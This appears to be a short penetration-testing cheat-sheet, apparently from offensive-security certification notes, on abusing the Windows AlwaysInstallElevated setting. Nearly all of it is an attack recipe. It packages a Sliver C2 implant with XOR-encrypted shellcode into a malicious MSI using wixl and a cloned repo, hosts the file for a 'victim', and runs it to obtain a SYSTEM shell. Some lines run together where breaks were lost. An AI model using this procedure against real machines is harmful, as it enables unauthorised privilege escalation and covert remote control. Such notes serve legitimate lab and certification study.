AlwaysInstallElevated
1) Install wixl
sudo apt install wixl2) Clone the MSI-AlwaysInstallElevated repo
cd ~/tools
git clone https://github.com/KINGSABRI/MSI-AlwaysInstallElevated
cd ~/tools/MSI-AlwaysInstallElevated3) C# OSEP binary with XOR encrypted shellcode into current directory
sudo cp /home/kali/OSEP/hav0c/sliver.x64.exe .
sudo chmod 777 sliver.x64.exe4) Modify on line 15
<File Id="File0" Name="setup.exe" Source="setup.exe" /> <!-- Put the executable on the same directory--><File Id="File0" Name="setup.exe" Source="sliver.x64.exe" /> <!-- Put the executable on the same directory-->5) Compile to .msi
6) Host the file on your machine for the victim machine to access it.
7) Run on the victim, another shell should pop up as NT Auth\System
Last updated